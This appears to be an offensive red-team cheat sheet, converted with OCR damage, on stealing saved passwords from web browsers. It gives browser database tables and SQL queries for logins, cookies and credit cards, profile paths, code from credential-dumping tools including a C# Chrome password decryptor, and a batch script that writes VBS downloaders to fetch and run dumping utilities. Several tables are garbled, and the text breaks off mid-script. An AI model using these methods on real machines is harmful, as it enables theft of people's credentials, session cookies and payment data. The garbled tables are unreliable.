

# RedTeamRecipe

Red Team Recipe for Fun & Profit.







# Methods for Stealing Password in Browser(RTC0013)



# **Important Tables and Columns**

Chrome

	Table Name	Column Name(s)	Description
lo	logins	action_url, username_value, password_value	Saved website
			logins and
			passwords
			Autofill data
	autofill	name, value	for forms and
			fields
			Stored
	cookies	host_key, name, value	browser
			cookies
			Bookmarked
	bookmarks	url, title	URLs and their
			titles

Table Name	Column Name(s)	Description
		Browsing
history	url, title	history URLs
		and their titles
		Records of
downloads	url, target_path	downloaded
		files
	namo on card	Saved credit
credit_cards	name_on_card, card_number	card
	caru_number	information
		Information
web_apps	url, name	about web
		applications
		Installed
extensions	name, permissions	browser
top_sites		extensions
	11	Most visited
top_sites	url, title	sites
1	1 1 1	Search engine
search_engines	keyword, url	configuration
		Media
media engagement	last engagement time usec	engagement
		data
	o wi cris	Media
media_history	origin,	playback
	playback_start_time_usec	history
		Media
media_session	media_unique_id	playback
		sessions
		URLs visited
		and the
visits	url, visit_time	corresponding
		times
		URL chains for
downloads_url_chains	url_chain	downloaded
		files
1	1	Keyword
keywords	keyword	searches made
		Search terms
borniond accords to	und loruson to	used for
keyword_search_terms	und loreson torres	useu 101
· , · · · · · · · · · · · · · · · · · ·	url, lower_term	specific
	url, lower_term	

Table Name	Column Name(s)	Description
usb_devices	guid	Information about connected USB devices
forms	name	Autofill form data
origins	origin	Origins for various browser data
network_action_predictor_servic	eurl, suggested_prio	Data for predicting network actions
protocol_handler	protocol, url	Custom protocol handlers configured
startup_urls	url	URLs that open on browser startup
appcache	cache_id, size	Application cache data
local_storage	origin, key	Locally stored data
extension_cookies	host_key, name, value	Cookies set by extensions
managed_user_passwords	url, username, password	Passwords for managed users
translate_ranking	origin	Data related to website translations
android_favicons	page_url	Favicons for Android version
Firefox		
mahla Nama	(-)	4.

# Table NameColumn Name(s)Descriptionmoz\_loginsformSubmitURL, hostname,<br/>encryptedUsername,<br/>encryptedPasswordSaved website logins<br/>and passwordsmoz\_autofillname, valueAutofill data for forms<br/>and fields

Table Name	Column Name(s)	Description
moz_cookies	host, name, value	Stored browser cookies
moz_bookmarks	url, title	Bookmarked URLs and their titles
moz_historyvisits	from_visit, place_id, visit_date	Visits to URLs with corresponding data
moz_downloads	source, target	Records of downloaded files
moz_creditcards	nameOnCard, cardNumber	Saved credit card information
moz_places	url, title	URLs and their corresponding titles
moz_extensions	name, permissions	Installed browser extensions
moz_keywords	keyword	Keyword searches made
moz_searchlog	query	Searches made using the browser's search bar
moz_meta	key, value	Metadata associated with various data
moz_origins	origin	Origins for various browser data
moz_annotations	type, name	User annotations on bookmarks
moz_inputhistory	input	User input history for forms
moz_favicons	url	Favicons associated with URLs
moz_inputhistory	place_id, fieldname	User input history for fields in forms
moz_pages_w_icon	spage_url	URLs with associated favicons
moz_places	url, title, visit_count	Visited URLs with additional data
moz_annos	anno_attribute_id, content	Annotations on bookmarks or pages
moz_meta	key, value	Metadata associated with various data
moz_annos	place_id, anno_attribute_id	Annotations on bookmarks or pages
moz_keywords	place_id, keyword_id	Keywords associated with places
moz_origins	origin	Origins for various browser data

	Table Name	Column Name(s)	Description
	moz_icons	url, favicon id	Favicons associated
	moz_icons	uii, iavicoii_iu	with URLs
moz_webapps	moz webanne	origin, app_id	Installed web
	moz_webapps	origini, app_id	applications
	moz_hosts	host	Hosts that visited URLs
	moz_cookies	baseDomain, name, value	Stored cookies
r	moz_syncedtabs	url titlo	Tabs synced across
		url, title	devices
	moz cuna		Synced data for user
moz_sync	ilioz_sylic	iu, name	accounts
	moz_preferences	hostname, value	User preferences
	moz downloads	z_downloads target, state	Records of downloaded
	IIIOZ_dowiiioaus		files
	Edge		

Table Name	Column Name(s)	Description
	action_url, username_value,	Saved website
logins	password_value	logins and
	passworu_varue	passwords
		Autofill data
autofill	name, value	for forms and
		fields
		Stored
cookies	host_key, name, value	browser
		cookies
		Bookmarked
bookmarks	url, title	URLs and their
		titles
		Browsing
history	url, title	history URLs
		and their titles
		Records of
downloads	url, target_path	downloaded
		files
	name_on_card,	Saved credit
credit_cards	card_number	card
	cara_number	information
		Installed
extensions	name, permissions	browser
		extensions
ton sites	url titlo	Most visited
top_sites	url, title	sites
search_engines	keyword, url	Search engine
scarcii_engines	ncy word, urr	configuration

Table Name	Column Name(s)	Description
	origin	Media
media_engagement		engagement
	last_eligagement_time_use	data
	origin	Media
media_history		playback
	origin, last_engagement_time_usec  origin, playback_start_time_usec  media_unique_id  url, visit_time  url_chain  keyword  url, lower_term  guid  name  origin	history
		Media
media_session	media_unique_id	playback
		sessions
		URLs visited
visits	url visit time	and the
VISICS	uii, visit_time	corresponding
		times
		URL chains for
downloads_url_chains	url_chain	downloaded
	url, visit_time  url_chain  keyword  url, lower_term  guid  name	files
keywords	keyword	Keyword
keywords	ncy word	searches made
		Search terms
keyword_search_terms	url lower term	used for
neyworu_search_terms	arr, rower_term	specific
		keywords
		Information
ısb_devices	guid	about
usb_uevices	Sara	connected USB
		devices
forms	name	Autofill form
		data
		Origins for
origins	origin	various
		browser data
		Data for
network_action_predictor_servic	eurl suggested prio	predicting
	- u=-, =u86===== <u>-</u> F===	network
		actions
		Custom
protocol_handler	protocol, url	protocol
<u>-</u>	Francisco, san	handlers
		configured
		URLs that
startup_urls	url	open on
<b>r —</b>	<del></del>	browser
		startup

Table Name	Column Name(s)	Description
appcache	cache id size	Application
appeaerie	cuciic_ia, 5i2c	cache data
local_storage	origin key	Locally stored
iocai_storage	origin, key	data
extension_cookies	host key name value	Cookies set by
extension_cookies	nost_key, name, value	extensions
		Passwords for
managed_user_passwords	url, username, password	managed
	cache_id, size  rage origin, key  _cookies host_key, name, value  _user_passwords url, username, password  _ranking origin	users
		Data related to
translate_ranking	origin	website
		translations
		Favicons for
android_favicons	page_url	Android
		version
•		

# **Awesome Query**

#### **Extract Cookies with Expiry Date**

```
SELECT host_key, name, value, expires_utc FROM cookies;
```

#### **Extract Autofill Data for Fields**

```
SELECT name, value FROM autofill WHERE field_type = 'field';
```

#### **Extract Bookmarked URLs with Tags**

```
SELECT url, title, GROUP_CONCAT(tags) AS bookmark_tags FROM bookmarks GROUP BY url, title;
```

#### **Extract Downloaded Files with Source and Target**

```
SELECT url, target_path, start_time, end_time FROM downloads;
```

#### **Extract Form Input Data with Origin**

```
SELECT origin, field_name, value FROM forms;
```

#### **Extract User Input History for Form Fields**

```
SELECT form_field, user_input FROM input_history;
```

#### **Extract Visited URLs with Timestamp and Referrer**

```
SELECT url, visit_time, referring_visit_id FROM visits;
```

#### **Extract User Annotations on Bookmarks with Dates**

```
SELECT url, annotation, created, modified FROM annotations;
```

#### **Extract Web Applications and Install Dates**

```
SELECT origin, app_id, last_update_time FROM web_apps;
```

#### **Extract Hosts Visited by URLs**

SELECT url, host FROM visits JOIN hosts ON visits.url = hosts.url;

#### **Extract Media Engagement Time and Count**

SELECT origin, SUM(count) AS total\_engagement\_count,
MAX(last\_engagement\_time\_usec) AS last\_engagement\_time FROM media\_engagement
GROUP BY origin;

#### **Extract User Search Queries with Timestamp**

SELECT keyword, url, search\_time FROM search\_engines;

#### **Extract Passwords Used for Form Submissions**

SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz\_logins WHERE formSubmitURL IS NOT NULL;

#### **Extract Credit Card Expiration Years and Months**

SELECT name\_on\_card, card\_number, expiration\_month, expiration\_year FROM
credit\_cards;

#### **Extract Synced Data with Device Information**

SELECT id, name, device\_type, last\_modified FROM sync;

#### **Extract Origins with Associated Data**

SELECT origin, origin\_attributes FROM origins;

#### **Extract Extensions with Install Dates**

SELECT name, permissions, install\_date FROM extensions;

#### **Extract Downloaded Files with Sizes**

SELECT url, target\_path, bytes\_total FROM downloads;

#### **Extract URL Chains for Downloaded Files**

SELECT url\_chain FROM downloads\_url\_chains;

#### **Extract Media Playback Sessions with Durations**

SELECT media\_unique\_id, playback\_start\_time\_usec, duration\_usec FROM
media\_session;

#### **Extract USB Device Information**

SELECT guid, manufacturer, product FROM usb\_devices;

#### **Extract Network Actions Predictions**

SELECT url, suggested\_prio FROM network\_action\_predictor\_service;

#### **Extract Protocol Handlers with Associated URLs**

SELECT protocol, url FROM protocol\_handler;

#### **Extract Startup URLs with Timestamps**

SELECT url, created FROM startup\_urls;

#### **Extract URLs with High Visit Counts**

SELECT url, title, visit\_count FROM visits WHERE visit\_count > 100;

#### **Extract Most Frequent Search Queries**

SELECT keyword, COUNT(\*) AS query\_count FROM search\_engines GROUP BY keyword ORDER BY query\_count DESC LIMIT 10;

#### **Extract Login Attempts with Failed Logins**

SELECT action\_url, username\_value, password\_value, times\_used, times\_failed
FROM logins WHERE times\_failed > 0;

#### **Extract Bookmarked URLs by Tag**

SELECT url, title, GROUP\_CONCAT(tags) AS bookmark\_tags FROM bookmarks GROUP BY url, title HAVING bookmark\_tags LIKE '%important%';

#### **Extract User Input History for Suspicious Keywords**

SELECT form\_field, user\_input, input\_timestamp FROM input\_history WHERE
user\_input LIKE '%password%' OR user\_input LIKE '%credit card%';

#### **Extract Synced Tabs with Last Update Timestamp**

SELECT url, title, last\_updated FROM synced\_tabs;

#### **Extract Cookies Set by Specific Domains**

SELECT host\_key, name, value FROM cookies WHERE host\_key IN ('example.com',
'test.com');

#### **Extract Form Input Data for Suspicious Domains**

SELECT origin, field\_name, value FROM forms WHERE origin LIKE '%phishing%';

#### **Extract Downloaded Files from Suspicious URLs**

SELECT url, target\_path, start\_time, end\_time FROM downloads WHERE url LIKE
'%malware%';

#### **Extract User Annotations with Suspicious Keywords**

SELECT url, annotation, created, modified FROM annotations WHERE annotation LIKE '%hack%' OR annotation LIKE '%exploit%';

#### **Extract URLs Visited with High Engagement Time**

SELECT url, visit\_time FROM visits WHERE visit\_time >= NOW() - INTERVAL 1 DAY

ORDER BY visit\_time DESC LIMIT 10;

#### **Extract User Input History for Frequent Keywords**

SELECT form\_field, user\_input, COUNT(\*) AS input\_count FROM input\_history WHERE user\_input IN ('password', 'credit card') GROUP BY form\_field, user\_input ORDER BY input\_count DESC LIMIT 10;

#### **Extract Most Used Extensions**

SELECT name, COUNT(\*) AS install\_count FROM extensions GROUP BY name ORDER BY install\_count DESC LIMIT 10;

#### Extract URLs with No Visits in the Last Month

SELECT url FROM history WHERE last\_visit\_time < NOW() - INTERVAL 30 DAY;</pre>

#### **Extract Suspicious Media Playback Sessions**

SELECT media\_unique\_id, playback\_start\_time\_usec, duration\_usec FROM media\_session WHERE duration\_usec > 3600000; -- Sessions longer than 1 hour

#### **Extract URLs with Frequent Keyword Searches**

SELECT url, title, COUNT(\*) AS search\_count FROM history WHERE title LIKE '%search%' GROUP BY url, title ORDER BY search\_count DESC LIMIT 10;

#### **Extract Frequent Form Inputs**

SELECT origin, form\_field, COUNT(\*) AS input\_count FROM forms GROUP BY origin, form\_field ORDER BY input\_count DESC LIMIT 10;

#### **Extract Suspicious USB Device Connections**

SELECT guid, manufacturer, product FROM usb\_devices WHERE manufacturer LIKE '%unknown%' ORDER BY connection\_timestamp DESC LIMIT 5;

#### **Extract URL Chains for Suspicious Downloads**

#### **Extract Synced Data for Suspicious Devices**

SELECT id, name, device\_type, last\_modified FROM sync WHERE device\_type =
'unknown';

#### **Extract URLs with Frequent Form Submissions**

SELECT action\_url, COUNT(\*) AS submission\_count FROM logins GROUP BY action\_url ORDER BY submission\_count DESC LIMIT 10;

#### **Extract Suspicious Protocol Handlers**

SELECT protocol, url FROM protocol\_handler WHERE protocol LIKE '%exploit%' LIMIT 5;

#### **Extract URLs with High Cookie Counts**

SELECT host\_key, COUNT(\*) AS cookie\_count FROM cookies GROUP BY host\_key
ORDER BY cookie\_count DESC LIMIT 10;

#### **Extract Origins with Suspicious Metadata**

SELECT origin, origin\_attributes FROM origins WHERE origin\_attributes LIKE '%suspicious%';

#### **Extract Frequent Extension Permissions**

SELECT permissions, COUNT(\*) AS extension\_count FROM extensions GROUP BY permissions ORDER BY extension\_count DESC LIMIT 10;

#### **Extract Suspicious Autofill Data**

SELECT name, value FROM autofill WHERE value LIKE '%password%' OR value LIKE '%credit card%';

#### **Profiles**

#### **Google Chrome:**

```
- Windows: `C:\Users\<YourUsername>\AppData\Local\Google\Chrome\User

Data\Default\Login Data`

- macOS: `~/Library/Application Support/Google/Chrome/Default/Login Data`

- Linux: `~/.config/google-chrome/Default/Login Data`
```

#### Mozilla Firefox:

#### **Brave:**

```
- Windows: `C:\Users\<YourUsername>\AppData\Local\BraveSoftware\Brave-

Browser\User Data\Default\Login Data`

- macOS: `~/Library/Application Support/BraveSoftware/Brave-

Browser/Default/Login Data`

- Linux: `~/.config/BraveSoftware/Brave-Browser/Default/Login Data`
```

#### Opera:

```
- Windows: `C:\Users\<YourUsername>\AppData\Roaming\Opera Software\Opera
Stable\Login Data`
- macOS: `~/Library/Application Support/com.operasoftware.Opera/Login Data`
- Linux: `~/.config/opera/Login Data`
```

#### Microsoft Edge (Chromium-based):

Path: C:\Users\<YourUsername>\AppData\Local\Microsoft\Edge\User
 Data\Default\Login Data

#### **HackBrowserData**

https://github.com/moonD4rk/HackBrowserData

HackBrowserData is a command-line tool for decrypting and exporting browser data (passwords, history, cookies, bookmarks, credit cards, download records, localStorage and extension) from the browser. It supports the most popular browsers on the market and runs on Windows, macOS and Linux.

```
.\hack-browser-data.exe -b all -f json --dir results -zip
or
.\hack-browser-data.exe -b chrome -p
"C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default"
```

How worked:

Windows

```
var (
            chromeUserDataPath
                                   = homeDir +
    "/AppData/Local/Google/Chrome/User Data/Default/"
            chromeBetaUserDataPath = homeDir + "/AppData/Local/Google/Chrome
    Beta/User Data/Default/"
            chromiumUserDataPath = homeDir + "/AppData/Local/Chromium/User
    Data/Default/"
            edgeProfilePath
                                   = homeDir +
1
    "/AppData/Local/Microsoft/Edge/User Data/Default/"
2
            braveProfilePath
                                   = homeDir +
3
    "/AppData/Local/BraveSoftware/Brave-Browser/User Data/Default/"
4
            speed360ProfilePath
                                   = homeDir +
5
    "/AppData/Local/360chrome/Chrome/User Data/Default/"
6
            qqBrowserProfilePath = homeDir +
7
    "/AppData/Local/Tencent/QQBrowser/User Data/Default/"
8
            operaProfilePath
                                   = homeDir + "/AppData/Roaming/Opera
9
    Software/Opera Stable/"
10
                                   = homeDir + "/AppData/Roaming/Opera
            operaGXProfilePath
11
    Software/Opera GX Stable/"
12
           vivaldiProfilePath
                                   = homeDir + "/AppData/Local/Vivaldi/User
13
    Data/Default/"
14
                                   = homeDir +
            coccocProfilePath
15
    "/AppData/Local/CocCoc/Browser/User Data/Default/"
16
           yandexProfilePath
                                   = homeDir +
17
    "/AppData/Local/Yandex/YandexBrowser/User Data/Default/"
18
            dcBrowserProfilePath = homeDir + "/AppData/Local/DCBrowser/User
    Data/Default/"
            sogouProfilePath
                                   = homeDir +
    "/AppData/Roaming/SogouExplorer/Webkit/Default/"
            firefoxProfilePath = homeDir +
    "/AppData/Roaming/Mozilla/Firefox/Profiles/"
```

#### Linux

```
var (
           firefoxProfilePath
1
                                 = homeDir + "/.mozilla/firefox/"
                                 = homeDir + "/.config/google-chrome/Default/"
2
           chromeProfilePath
3
           chromiumProfilePath = homeDir + "/.config/chromium/Default/"
4
           edgeProfilePath
                                 = homeDir + "/.config/microsoft-edge/Default/"
           braveProfilePath
                                 = homeDir + "/.config/BraveSoftware/Brave-
5
6
   Browser/Default/"
           chromeBetaProfilePath = homeDir + "/.config/google-chrome-
7
8
   beta/Default/"
9
           operaProfilePath = homeDir + "/.config/opera/Default/"
           vivaldiProfilePath = homeDir + "/.config/vivaldi/Default/"
10
```

#### Darwin

```
var (
           chromeProfilePath
                                 = homeDir + "/Library/Application
   Support/Google/Chrome/Default/"
           chromeBetaProfilePath = homeDir + "/Library/Application
   Support/Google/Chrome Beta/Default/"
           chromiumProfilePath = homeDir + "/Library/Application
   Support/Chromium/Default/"
1
2
           edgeProfilePath
                                 = homeDir + "/Library/Application
3
   Support/Microsoft Edge/Default/"
           braveProfilePath
4
                                = homeDir + "/Library/Application
5
   Support/BraveSoftware/Brave-Browser/Default/"
           operaProfilePath
                                 = homeDir + "/Library/Application
7
   Support/com.operasoftware.Opera/Default/"
           operaGXProfilePath
                                 = homeDir + "/Library/Application
8
9
   Support/com.operasoftware.OperaGX/Default/"
10
           vivaldiProfilePath
                                 = homeDir + "/Library/Application
   Support/Vivaldi/Default/"
11
           coccocProfilePath = homeDir + "/Library/Application
12
   Support/Coccoc/Default/"
13
14
           yandexProfilePath
                                = homeDir + "/Library/Application
   Support/Yandex/YandexBrowser/Default/"
15
           arcProfilePath
                                 = homeDir + "/Library/Application
   Support/Arc/User Data/Default"
           firefoxProfilePath = homeDir + "/Library/Application
   Support/Firefox/Profiles/"
```

## **Browser-password-stealer**

https://github.com/henry-richard7/Browser-password-stealer

This python program gets all the saved passwords, credit cards and bookmarks from chromium based browsers supports chromium 80 and above!

```
pip install -r requirements.txt
python chromium_based_browsers.py
```

How worked:

```
browsers = {
        'amigo': appdata + '\\Amigo\\User Data',
        'torch': appdata + '\\Torch\\User Data',
1
        'kometa': appdata + '\\Kometa\\User Data',
2
        'orbitum': appdata + '\\Orbitum\\User Data',
3
        'cent-browser': appdata + '\\CentBrowser\\User Data',
4
        '7star': appdata + '\\7Star\\7Star\\User Data',
5
        'sputnik': appdata + '\\Sputnik\\Sputnik\\User Data',
6
        'vivaldi': appdata + '\\Vivaldi\\User Data',
7
        'google-chrome-sxs': appdata + '\\Google\\Chrome SxS\\User Data',
8
        'google-chrome': appdata + '\\Google\\Chrome\\User Data',
9
        'epic-privacy-browser': appdata + '\\Epic Privacy Browser\\User Data',
10
        'microsoft-edge': appdata + '\Microsoft\\Edge\\User Data',
11
        'uran': appdata + '\\uCozMedia\\Uran\\User Data',
12
        'yandex': appdata + '\\Yandex\\YandexBrowser\\User Data',
13
        'brave': appdata + '\\BraveSoftware\\Brave-Browser\\User Data',
14
        'iridium': appdata + '\\Iridium\\User Data',
15
16
17
    data_queries = {
18
        'login_data': {
19
            'query': 'SELECT action_url, username_value, password_value FROM
20
    logins',
21
            'file': '\\Login Data',
22
            'columns': ['URL', 'Email', 'Password'],
23
            'decrypt': True
24
        },
25
        'credit_cards': {
26
            'query': 'SELECT name_on_card, expiration_month, expiration_year,
27
    card_number_encrypted, date_modified FROM credit_cards',
28
            'file': '\\Web Data',
29
            'columns': ['Name On Card', 'Card Number', 'Expires On', 'Added
30
    On'],
31
            'decrypt': True
32
        },
33
        'cookies': {
34
            'query': 'SELECT host_key, name, path, encrypted_value, expires_utc
35
    FROM cookies',
36
            'file': '\\Network\\Cookies',
37
            'columns': ['Host Key', 'Cookie Name', 'Path', 'Cookie', 'Expires
38
    On'],
39
            'decrypt': True
40
        },
41
        'history': {
42
            'query': 'SELECT url, title, last_visit_time FROM urls',
43
            'file': '\\History',
44
            'columns': ['URL', 'Title', 'Visited Time'],
45
            'decrypt': False
46
        },
47
        'downloads': {
48
            'query': 'SELECT tab_url, target_path FROM downloads',
49
            'file': '\\History',
50
             'columns': ['Download URL', 'Local Path'],
51
             'decrypt': False
        }
    }
```

## **BrowserPass**

is an open-source project that provides a command-line interface for fetching passwords stored in various browsers' password managers and presenting them in a standardized format. It's designed to be used on Linux-based systems and aims to be a convenient tool for users who want to access their passwords in a unified way.

```
1 cse *.sln
```

How worked:

```
1
    namespace BrowserPass
2
3
        /// <summary>
4
        /// http://raidersec.blogspot.com/2013/06/how-browsers-store-your-
5
    passwords-and.html#chrome_decryption
        /// </summary>
6
7
        class ChromePassReader : IPassReader
8
9
            public string BrowserName { get { return "Chrome"; } }
10
            private const string LOGIN DATA PATH =
11
12
    "\\..\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";
13
14
15
            public IEnumerable<CredentialModel> ReadPasswords()
16
17
                var result = new List<CredentialModel>();
18
19
                var appdata =
    Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);//
20
21
    APPDATA
22
                var p = Path.GetFullPath(appdata + LOGIN DATA PATH);
23
24
                if (File.Exists(p))
25
                {
26
                    using (var conn = new SQLiteConnection($"Data Source={p};"))
27
28
                        conn.Open();
                        using (var cmd = conn.CreateCommand())
29
30
31
                             cmd.CommandText = "SELECT action_url,
    username_value, password_value FROM logins";
32
33
                             using (var reader = cmd.ExecuteReader())
34
                             {
35
                                 if (reader.HasRows)
36
37
38
                                     var key = GCDecryptor.GetKey();
39
                                     while (reader.Read())
40
                                     {
                                         byte[] nonce, ciphertextTag;
41
42
                                         var encryptedData = GetBytes(reader, 2);
43
                                         GCDecryptor.Prepare(encryptedData, out
44
    nonce, out ciphertextTag);
45
                                         var pass =
    GCDecryptor.Decrypt(ciphertextTag, key, nonce);
46
47
                                         result.Add(new CredentialModel()
48
49
                                                     {
50
                                                         Url =
51
    reader.GetString(0),
52
                                                         Username =
53
    reader.GetString(1),
54
                                                         Password = pass
55
                                                     });
56
                                     }
57
                                 }
58
                             }
59
                         conn.Close();
60
61
                    }
62
63
                }
64
                else
65
                {
```

```
66
                    throw new FileNotFoundException("Canno find chrome logins
   file");
67
68
69
                return result;
70
            }
71
72
            private byte[] GetBytes(SQLiteDataReader reader, int columnIndex)
73
74
                const int CHUNK_SIZE = 2 * 1024;
75
                byte[] buffer = new byte[CHUNK_SIZE];
76
                long bytesRead;
77
                long fieldOffset = 0;
                using (MemoryStream stream = new MemoryStream())
78
79
                    while ((bytesRead = reader.GetBytes(columnIndex,
80
81
    fieldOffset, buffer, 0, buffer.Length)) > 0)
82
                         stream.Write(buffer, 0, (int)bytesRead);
                        fieldOffset += bytesRead;
                    }
                    return stream.ToArray();
            }
        }
```

#### **WebBrowserPassView**

https://www.nirsoft.net/utils/web\_browser\_password.html

WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 – 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser.

```
1 WebBrowserPassView.exe
```

#### **Infornito**

https://github.com/globecyber/Infornito

Infornito developed in Python 3.x and has as purpose extract all forensic interesting information of Chrome, Firefox, Safari browsers to be analyzed. Due to its Python 3.x developement, might not work properly in old Python versions, mainly with certain characters. Works under Unix and Windows 32/64 bits systems. Works in command line interface, so information dumps could be redirected by pipes with tools such as grep, awk, cut, sed... Infornito allows to visualize following sections, search customization and extract certain content.

```
python infornito.py downloads --profile 2
```

or

```
python informito.py history --profile 2 --filter domain=target.com --filter filetype=pdf --filter protocols=https --filter port=4880
```

# **Hindsight**

https://github.com/obsidianforensics/hindsight

Hindsight is a free tool for analyzing web artifacts. It started with the browsing history of the Google Chrome web browser and has expanded to support other Chromium-based applications (with more to come!). Hindsight can parse a number of different types of web artifacts, including URLs, download history, cache records, bookmarks, autofill records, saved passwords, preferences, browser extensions, HTTP cookies, and Local Storage records (HTML5 cookies). Once the data is extracted from each file, it is correlated with data from other history files and placed in a timeline.

```
pip install pyhindsight

curl -sSL

https://raw.githubusercontent.com/obsidianforensics/hindsight/master/install-
js.sh | sh
```

It has a simple web UI - to start it, run "hindsight\_gui.py" (or on Windows, the packaged "hindsight\_gui.exe") and visit <a href="http://localhost:8080">http://localhost:8080</a>

How worked:

```
- WinXP: [userdir]\Local Settings\Application Data\Google\Chrome\User

Data\Default

- Vista/7/8/10: [userdir]\AppData\Local\Google\Chrome\User Data\Default

- Linux: [userdir]/.config/google-chrome/Default

- OS X: [userdir]/Library/Application Support/Google/Chrome/Default

- iOS: \Applications\com.google.chrome.ios\Library\Application

Support\Google\Chrome\Default

- Android: /userdata/data/com.android.chrome/app_chrome/Default

- CrOS: \home\user\<GUID>
```

#### **BrowserFreak**

https://github.com/OsandaMalith/BrowserFreak

Automated Password Dumper for Web Browsers with Batch Script

```
1 BrowserFreak.bat
```

How worked:

```
1
     ::Downlaod Chrome::
2
3
     echo strFileURL = "http://www.nirsoft.net/utils/chromepass.zip" >
4
     %temp%\freak\chrome.vbs
5
     echo strHDLocation = "%temp%\freak\chromepass.zip" >>
6
     %temp%\freak\chrome.vbs
7
     echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >>
8
     %temp%\freak\chrome.vbs
9
     echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\chrome.vbs
10
     echo objXMLHTTP.send() >> %temp%\freak\chrome.vbs
     echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\chrome.vbs
11
     echo Set objADOStream = CreateObject("ADODB.Stream") >>
     %temp%\freak\chrome.vbs
13
     echo objADOStream.Open >> %temp%\freak\chrome.vbs
14
15
     echo objADOStream.Type = 1 >> %temp%\freak\chrome.vbs
16
     echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\chrome.vbs
     echo objADOStream.Position = 0 >> %temp%\freak\chrome.vbs
17
     echo Set objFSO = Createobject("Scripting.FileSystemObject") >>
18
19
     %temp%\freak\chrome.vbs
     echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile
20
21
     strHDLocation >> %temp%\freak\chrome.vbs
     echo Set objFSO = Nothing >> %temp%\freak\chrome.vbs
22
     echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\chrome.vbs
23
     echo objADOStream.Close >> %temp%\freak\chrome.vbs
25
     echo Set objADOStream = Nothing >> %temp%\freak\chrome.vbs
26
     echo End if >> %temp%\freak\chrome.vbs
     echo Set objXMLHTTP = Nothing >> %temp%\freak\chrome.vbs
27
     call %temp%\freak\chrome.vbs
28
29
30
     ::Download Firefox::
31
     echo strFileURL = "http://www.nirsoft.net/utils/passwordfox.zip" >
     %temp%\freak\fire.vbs
32
     echo strHDLocation = "%temp%\freak\passwordfox.zip" >>
33
34
     %temp%\freak\fire.vbs
     echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >>
35
36
     %temp%\freak\fire.vbs
     echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\fire.vbs
38
     echo objXMLHTTP.send() >> %temp%\freak\fire.vbs
     echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\fire.vbs
39
40
     echo Set objADOStream = CreateObject("ADODB.Stream") >>
     %temp%\freak\fire.vbs
41
42
     echo objADOStream.Open >> %temp%\freak\fire.vbs
     echo objADOStream.Type = 1 >> %temp%\freak\fire.vbs
43
44
     echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\fire.vbs
     echo objADOStream.Position = 0 >> %temp%\freak\fire.vbs
     echo Set objFSO = Createobject("Scripting.FileSystemObject") >>
     %temp%\freak\fire.vbs
47
     echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile
48
49
     strHDLocation >> %temp%\freak\fire.vbs
     echo Set objFSO = Nothing >> %temp%\freak\fire.vbs
50
51
     echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\fire.vbs
52
     echo objADOStream.Close >> %temp%\freak\fire.vbs
     echo Set objADOStream = Nothing >> %temp%\freak\fire.vbs
53
54
     echo End if >> %temp%\freak\fire.vbs
     echo Set objXMLHTTP = Nothing >> %temp%\freak\fire.vbs
55
     call %temp%\freak\fire.vbs
56
57
     ::Download IE::
58
59
     echo strFileURL = "http://www.nirsoft.net/utils/iepv.zip" >
60
     %temp%\freak\ie.vbs
     echo strHDLocation = "%temp%\freak\iepv.zip" >> %temp%\freak\ie.vbs
61
     echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >> %temp%\freak\ie.vbs
     echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\ie.vbs
     echo objXMLHTTP.send() >> %temp%\freak\ie.vbs
64
     echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\ie.vbs
65
```

```
echo Set objADOStream = CreateObject("ADODB.Stream") >> %temp%\freak\ie.vbs
66
    echo objADOStream.Open >> %temp%\freak\ie.vbs
67
    echo objADOStream.Type = 1 >> %temp%\freak\ie.vbs
68
69
    echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\ie.vbs
70
    echo objADOStream.Position = 0 >> %temp%\freak\ie.vbs
71
    echo Set objFSO = Createobject("Scripting.FileSystemObject") >>
72
    %temp%\freak\ie.vbs
    echo If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile
73
74
    strHDLocation >> %temp%\freak\ie.vbs
    echo Set objFSO = Nothing >> %temp%\freak\ie.vbs
75
76
    echo objADOStream.SaveToFile strHDLocation >> %temp%\freak\ie.vbs
    echo objADOStream.Close >> %temp%\freak\ie.vbs
78
    echo Set objADOStream = Nothing >> %temp%\freak\ie.vbs
79
    echo End if >> %temp%\freak\ie.vbs
    echo Set objXMLHTTP = Nothing >> %temp%\freak\ie.vbs
81
    call %temp%\freak\ie.vbs
82
83
    ::Download Opera::
    echo strFileURL = "http://www.nirsoft.net/utils/operapassview.zip" >
85
    %temp%\freak\opera.vbs
    echo strHDLocation = "%temp%\freak\operapassview.zip" >>
86
     %temp%\freak\opera.vbs
87
    echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") >>
89
     %temp%\freak\opera.vbs
90
    echo objXMLHTTP.open "GET", strFileURL, false >> %temp%\freak\opera.vbs
    echo objXMLHTTP.send() >> %temp%\freak\opera.vbs
91
    echo If objXMLHTTP.Status = 200 Then >> %temp%\freak\opera.vbs
93
    echo Set objADOStream = CreateObject("ADODB.Stream") >>
94
    %temp%\freak\opera.vbs
95
    echo objADOStream.Open >> %temp%\freak\opera.vbs
96
    echo objADOStream.Type = 1 >> %temp%\freak\opera.vbs
97
    echo objADOStream.Write objXMLHTTP.ResponseBody >> %temp%\freak\opera.vbs
98
    echo objADOStream.Position = 0 >> %temp%\freak\opera.vbs
    echo Set objFSO = Createobject("Scripting.FileSystemObject") >>
99
